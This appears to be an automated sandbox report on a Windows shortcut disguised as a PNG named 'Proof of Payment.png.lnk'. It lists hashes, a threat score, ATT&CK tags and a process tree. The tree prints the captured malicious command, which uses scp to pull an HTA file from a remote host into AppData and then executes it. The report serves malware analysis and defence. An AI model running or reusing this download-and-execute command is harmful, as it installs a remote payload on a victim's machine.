43941890cfd819b895745b34b67a20841053b581c8accb91d5fa2bc5769c22f7

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
08-08-2023 06:52

Target

Proof of Payment.png.lnk
Size

2KB
MD5

7fbef0e70374a3d060f988dfc3a33ee2
SHA1

0283553cf1aed054774279e93730e3039dda27a2
SHA256

43941890cfd819b895745b34b67a20841053b581c8accb91d5fa2bc5769c22f7
SHA512

1a51a49376dd2846efc168ec09d7ce48b013d179e7b776d3e33a623aba41d5fd4ece9431b6cbb949a93c8e9a3e586912b8e339cbc34513afe8fdf09a395a8c02

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2784 wrote to memory of 2704	2784	cmd.exe	29
PID 2784 wrote to memory of 2704	2784	cmd.exe	29
PID 2784 wrote to memory of 2704	2784	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Proof of Payment.png.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:2784
- C:\WINDOWS\system32\cmd.exe
  "C:\WINDOWS\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/bd/HJzw C:\Users\Admin\AppData\Roaming\QBFK.hta" & C:\Users\Admin\AppData\Roaming\QBFK.hta
  2⤵
  PID:2704

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact